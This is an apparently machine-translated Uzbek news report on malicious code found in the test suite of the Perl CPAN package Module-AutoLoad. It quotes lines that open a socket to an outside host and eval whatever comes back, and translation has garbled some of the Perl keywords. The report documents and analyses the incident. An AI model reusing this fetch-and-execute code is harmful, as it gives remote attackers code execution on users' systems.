Module-AutoLoad Perl paketida zararli kod aniqlandi

CPAN katalogi orqali tarqatilgan Perl paketida Modul - Avtomatik yuklash, CPAN modullarini tezda avtomatik ravishda yuklash uchun mo'ljallangan, aniqlangan zararli kod. Zararli kiritish edi topildi test kodida 05_rcx.t, 2011 yildan beri yuk tashish.
Shunisi e'tiborga loyiqki, shubhali kodni yuklash haqida savollar paydo bo'ldi StackOverflow qaytib 2016 yilda.

Zararli faoliyat modulni o'rnatishda ishga tushirilgan test to'plamini bajarish paytida uchinchi tomon serveridan (http://r.cx:1/) kodni yuklab olish va bajarishga urinish bilan yakunlanadi. Taxminlarga ko'ra, dastlab tashqi serverdan yuklab olingan kod zararli bo'lmagan, ammo endi so'rov ww.limera1n.com domeniga yo'naltirilgan bo'lib, u kodning o'z qismini bajarilishini ta'minlaydi.

Faylda yuklab olishni tashkil qilish uchun 05_rcx.t Quyidagi kod ishlatiladi:

mening $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mening $ sinash = `$^X $prog`;

Belgilangan kod skriptning bajarilishiga olib keladi ../contrib/RCX.pl, uning mazmuni qatorga qisqartiriladi:

lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88 dan foydalaning.":1″};

Bu skript yuklanadi chalkash xizmatdan foydalanish perlobfuscator.com tashqi xost r.cx dan kod (82.46.99.88 belgilar kodlari "R.cX" matniga mos keladi) va uni baholash blokida bajaradi.

$ perl -MIO::Socket -e'$b=yangi IO::Socket::INET 82.46.99.88.":1″; chop <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

O'rashdan so'ng, oxir-oqibat quyidagilar amalga oshiriladi: kodi:

chop etish{$b=new IO::Socket::INET"ww.limera1n.com:80″}" OLISH /iJailBreak
";evalor return warn$@while$b;1

Muammoli paket endi ombordan olib tashlandi. Pauza (Perl Authors Upload Server) va modul muallifining hisobi bloklangan. Bunday holda, modul hali ham qoladi mavjud MetaCPAN arxivida va cpanminus kabi ba'zi yordam dasturlari yordamida to'g'ridan-to'g'ri MetaCPAN'dan o'rnatilishi mumkin. Qayd etilganpaket keng tarqalmaganligi.

Muhokama qilish qiziq ulangan va modul muallifi, uning “r.cx” sayti buzib kirilganidan so‘ng zararli kod kiritilgani haqidagi ma’lumotni inkor etib, u shunchaki zavqlanayotganini tushuntirib, perlobfuscator.com saytidan nimanidir yashirish uchun emas, balki hajmini kamaytirish uchun foydalangan. kodni o'zgartirish va uni clipboard orqali nusxalashni soddalashtirish. “Botstrap” funksiya nomini tanlash bu so‘z “botga o‘xshaydi va bootstrapdan qisqaroq” ekanligi bilan izohlanadi. Modul muallifi, shuningdek, aniqlangan manipulyatsiyalar zararli harakatlar qilmasligiga, faqat TCP orqali kodning yuklanishi va bajarilishini namoyish etishiga ishontirdi.

Manba: opennet.ru